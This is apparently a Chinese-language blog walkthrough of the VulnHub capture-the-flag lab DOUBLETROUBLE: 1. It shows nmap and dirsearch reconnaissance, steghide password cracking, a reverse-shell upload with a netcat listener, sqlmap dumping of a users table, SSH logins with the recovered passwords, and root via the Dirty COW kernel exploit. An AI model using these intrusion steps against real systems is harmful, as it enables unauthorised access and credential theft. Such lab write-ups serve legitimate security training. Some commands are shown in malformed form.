DOUBLETROUBLE: 1实战演练

DOUBLETROUBLE: 1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/doubletrouble-1,743/

设备名称IP地址
靶机:DOUBLETROUBLE: 1192.168.0.108
攻击机:kali192.168.0.112
二、信息收集
1、nmap探测目标靶机端口
kali@kali:~$ nmap -A 192.168.0.108
# 开放SSH:22、WEB:80端口

在这里插入图片描述

2、扫描目标网址目录
kali@kali:~$ sudo dirsearch -u "http://192.168.0.108/"

在这里插入图片描述

3、访问网站,发现secret下有个图片
http://192.168.0.108/secret/

在这里插入图片描述

4、将图片下载
kali@kali:~$ http://192.168.0.108/secret/doubletrouble.jpg

在这里插入图片描述

5、查看图片所含内容
kali@kali:~$ steghide --info doubletrouble.jpg
# 发现有密码

在这里插入图片描述

6、破解密码并查看
kali@kali:~$ steghide doubletrouble.jpg rouckyou.txt -xf 密码.txt
# 邮箱:otisrush@localhost.com
# 密码:otis666

在这里插入图片描述

7、登陆邮箱

在这里插入图片描述

8、创建反弹shell

网址:https://www.revshells.com/
在这里插入图片描述

9、上传反弹shell

在这里插入图片描述

10、监听
http://192.168.0.108/uploads/users/
kali@kali:~$ nc -lvnp 9001

在这里插入图片描述

在这里插入图片描述

11、写入交互式shell
$ python -c "import pty;pty.spawn('/bin/bash')"
三、提权
1、查看权限并提权
www-data@doubletrouble:/$ sudo -l

在这里插入图片描述

2、查看文件
root@doubletrouble:~# ls
# 发现一个镜像文件

在这里插入图片描述

3、下载镜像文件
root@doubletrouble:~# python3 -m http.server
http://192.168.0.108:8000

在这里插入图片描述
在这里插入图片描述

4、安装镜像
四、信息收集
1、nmap探测目标靶机端口
kali@kali:~$ nmap -A 192.168.0.109
# 开放SSH:22、WEB:80端口

在这里插入图片描述

2、访问网站
http://192.168.0.109

在这里插入图片描述

3、利用sqlmap注入
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms --batch

在这里插入图片描述

4、获取数据库
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms --dbs --batch

在这里插入图片描述

5、获取表名
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble --tables --batch

在这里插入图片描述

6、获取列名
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble -T users --columns --batch

在这里插入图片描述

7、获取字段值
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble -T users -C username,password --batch
# 第一个用户
# 用户名:montreux	密码:GfsZxc1
# 第二个用户
# 用户名:clapton	密码:ZubZub99

在这里插入图片描述

8、SSH远程登陆
# 利用获取的账号密码从SSH开放的端口登陆
# 第一个用户名登录
kali@kali:~$ssh montreux@192.168.0.109
# 第二个用户吗登录
kali@kali:~$ssh clapton@192.168.0.109

在这里插入图片描述

五、提权
1、查看文件
clapton@doubletrouble:~$ ls
clapton@doubletrouble:~$ cat user.txt

在这里插入图片描述

2、查看系统信息内核

源码地址:https://github.com/FireFart/dirtycow/blob/master/dirty.c

clapton@doubletrouble:~$ uname -a
# 发现内核版本为3.2.X,有Dirty Cow漏洞

在这里插入图片描述

3、编译源码
# 将源码复制到nano dirty.c中,并创建一个root密码
clapton@doubletrouble:~$ nano dirty.c
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$./dirty root
# 部分源码,全部源码见上方源码地址
# 用户名:firefart	密码:root

在这里插入图片描述

在这里插入图片描述

4、切换用户并查看文件
clapton@doubletrouble:~$ su firefart
firefart@doubletrouble:/home/clapton# ls
firefart@doubletrouble:/home/clapton# cd
firefart@doubletrouble:~# ls
firefart@doubletrouble:~# cat root.txt

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值